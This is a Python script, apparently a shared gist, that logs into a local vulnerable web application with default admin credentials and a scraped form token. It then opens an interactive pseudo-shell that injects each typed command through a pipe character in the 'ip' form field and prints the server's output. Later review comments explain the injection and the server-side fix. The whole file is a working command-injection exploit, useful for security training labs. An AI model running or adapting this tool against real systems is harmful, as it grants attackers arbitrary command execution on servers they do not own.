@echel0nn
Created January 28, 2020 11:21
#!/usr/bin/env python
import requests
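def setSessionCookie(URL):
    """Fetch ``URL`` and return its cookies together with the form token.

    Args:
        URL: Page whose HTML carries the hidden ``user_token`` field
            (the login form in this script).

    Returns:
        A ``(cookies, user_token)`` tuple: the cookie jar of the GET
        response and the value ``parseToken`` extracts from its body.
    """
    # Bounded wait: without a timeout, requests blocks indefinitely when the
    # server accepts the connection but never answers.
    pre_req = requests.get(URL, timeout=10)
    user_token = parseToken(pre_req.text)
    return pre_req.cookies, user_token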
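def parseToken(FULL_TEXT):
    """Extract the hidden ``user_token`` form value from an HTML page.

    The page is scanned line by line for ``name='user_token'``; when several
    lines match, the last one wins.

    Args:
        FULL_TEXT: HTML body as text.

    Returns:
        The token string, or ``""`` when no line carries the field or the
        matching line has no single-quoted ``value`` attribute.
    """
    HINT_STRING = "name='user_token'"
    VALUE_OPEN = "value='"

    token_line = ""
    for line in FULL_TEXT.split("\n"):
        if HINT_STRING in line:
            token_line = line

    # Take what sits between value=' and the next quote. Stripping one exact
    # "<input ...>" prefix instead returns markup rather than the token when
    # the attributes are ordered differently, and leaves leading spaces in
    # the token when the page is indented with spaces instead of tabs.
    _, _, tail = token_line.partition(VALUE_OPEN)
    token = tail.partition("'")[0]
    return token.replace("\t", "").strip()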
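def parseCommandOutput(FULL_TEXT):
    """Return the text found inside the ``<pre>`` elements of an HTML page.

    Every ``<pre>...</pre>`` section is collected in document order and each
    one ends with a newline in the result. An unclosed ``<pre>`` runs to the
    end of the page.

    Args:
        FULL_TEXT: HTML body as text.

    Returns:
        The concatenated ``<pre>`` contents, or ``""`` when the page has no
        ``<pre>`` element.
    """
    HINT_STRING_START = "<pre>"
    HINT_STRING_STOP = "</pre>"

    pieces = []
    cursor = 0
    while True:
        start = FULL_TEXT.find(HINT_STRING_START, cursor)
        if start == -1:
            break
        start += len(HINT_STRING_START)
        # Searching the whole text (not line by line) also handles
        # "<pre>text</pre>" on a single line. A per-line scan that skips the
        # stop check on the opening line never leaves capture mode there and
        # returns the rest of the page as if it were output.
        stop = FULL_TEXT.find(HINT_STRING_STOP, start)
        if stop == -1:
            body = FULL_TEXT[start:]
        else:
            body = FULL_TEXT[start:stop]
        if body and not body.endswith("\n"):
            body += "\n"
        pieces.append(body)
        if stop == -1:
            break
        cursor = stop + len(HINT_STRING_STOP)
    return "".join(pieces)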
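def getCredentials(USERNAME, PASSWORD):
    """Submit the login form on localhost and return the session cookies.

    The login page is fetched first to obtain the cookie jar and the hidden
    ``user_token`` value, then the form is posted with the same cookies.

    Args:
        USERNAME: Account name sent in the ``username`` field.
        PASSWORD: Password sent in the ``password`` field.

    Returns:
        The cookie jar obtained from the initial GET of the login page.
    """
    URL = "http://localhost/login.php"
    COOKIES, USER_TOKEN = setSessionCookie(URL)
    post_data = {
        'username': USERNAME,
        'password': PASSWORD,
        'Login': 'Login',
        'user_token': USER_TOKEN,
    }
    # NOTE(review): the login response is not inspected, so a rejected login
    # is not detected here; the caller receives the same cookie jar either way.
    # The timeout keeps a stalled server from blocking the script forever.
    requests.post(URL, data=post_data, cookies=COOKIES, timeout=10)
    return COOKIES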
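def komutCalistir(URL, COMMAND, COOKIES):
    """Post ``COMMAND`` through the form's ``ip`` field and print the reply.

    Args:
        URL: Address of the form that accepts the ``ip`` field.
        COMMAND: Text appended after the fixed address and separator.
        COOKIES: Session cookies sent with the request.

    Returns:
        None. The ``<pre>`` content of the response is printed to stdout.
    """
    # "\x7c" is the pipe character "|", placed between a fixed address and
    # COMMAND. NOTE(review): this only has an effect if the server builds a
    # shell command line from ``ip`` without validating it (server code is not
    # on this page). The server-side fix is to accept only a parsed IP address
    # and to invoke the tool with an argument list, not through a shell.
    post_data = {'ip': "192.168.147.147\x7c" + COMMAND, 'Submit': 'Submit'}
    # Bounded wait so a stalled request does not freeze the prompt loop.
    COMMAND_EXECUTION_REQUEST = requests.post(
        URL, data=post_data, cookies=COOKIES, timeout=10
    )
    outpt = parseCommandOutput(COMMAND_EXECUTION_REQUEST.text)
    # NOTE(review): the response body is printed as received; control
    # characters sent by the server reach the terminal unfiltered.
    print(outpt)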
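if __name__ == "__main__":
    # Both the login page and this form are addressed on localhost.
    URL = "http://localhost/vulnerabilities/exec/"
    # NOTE(review): credentials are hard-coded; presumably the default account
    # of a local training application. Confirm before reuse.
    COOKIES = getCredentials("admin", "password")
    while True:
        try:
            # NOTE(review): the shebang says "python". Under Python 2, input()
            # evaluates what is typed as Python code, so run this with Python 3.
            komut = str(input("[www-data]~>"))
        except (EOFError, KeyboardInterrupt):
            # Ctrl-D / Ctrl-C ends the prompt loop cleanly, without a traceback.
            print()
            break
        komutCalistir(URL, komut, COOKIES)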